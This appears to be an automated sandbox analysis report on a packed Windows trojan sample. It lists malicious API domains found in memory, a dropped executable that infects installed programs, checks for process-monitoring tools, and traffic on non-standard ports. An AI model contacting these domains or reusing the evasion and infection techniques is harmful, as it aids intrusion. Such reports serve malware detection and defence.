Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comJq
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store/
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/M
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snuggleapplicationswo.fun/y
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001EF9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/api
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/apiG
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342559578.0000000001EFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/apii9
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337504737.0000000001EEB000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342368005.0000000001EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store:443/api7
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/7
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/8
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theoryapparatusjuko.fun/
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1337936959.0000000001F12000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1342700657.0000000001F15000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_70.exe, 00000000.00000003.1338255788.0000000001F14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theoryapparatusjuko.fun/api
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_52582d98-f

System Summary

PE file contains section with special chars

Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: ;Mu
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: oHOvZLBf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF6076		2_2_00DF6076
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF6D00		2_2_00DF6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000002.1339219519.0000000000F52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe
Source: Lisect_AVT_24003_G1A_70.exe, 00000000.00000000.1288403069.0000000001131000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe
Source: Lisect_AVT_24003_G1A_70.exe	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_70.exe

Source: Lisect_AVT_24003_G1A_70.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: oHOvZLBf.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: oHOvZLBf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: oHOvZLBf.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: Section: ZLIB complexity 0.9938739825885656
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: Section: ZLIB complexity 1.0038910505836576
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: Section: ZLIB complexity 0.998429693076374
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: Section: ZLIB complexity 0.9976855624735144

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@7/15@8/1

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_00DF119F

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7520

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

File created: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lisect_AVT_24003_G1A_70.exe

Virustotal: Detection: 86%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Lisect_AVT_24003_G1A_70.exe

Static file information: File size 6279680 > 1048576

Source: Lisect_AVT_24003_G1A_70.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x4d3ab2

Source: Lisect_AVT_24003_G1A_70.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Unpacked PE file: 2.2.oHOvZLBf.exe.df0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: ;Mu

Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: .imports
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: .themida
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: .boot
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: ;Mu
Source: oHOvZLBf.exe.0.dr	Static PE information: section name: .aspack
Source: oHOvZLBf.exe.0.dr	Static PE information: section name: .adata
Source: SciTE.exe.2.dr	Static PE information: section name: u
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF1638 push dword ptr [00DF3084h]; ret	2_2_00DF170E
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF2D9B push ecx; ret	2_2_00DF2DAB
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF6014 push 00DF14E1h; ret	2_2_00DF6425
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Code function: 2_2_00DF600A push ebp; ret	2_2_00DF600D

Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: entropy: 7.961868081494972
Source: Lisect_AVT_24003_G1A_70.exe	Static PE information: section name: ;Mu entropy: 6.935039632025298
Source: oHOvZLBf.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.933628777130411
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934522898773344
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934569393442332

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	File created: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Window searched: window name: RegmonClass	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 799

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
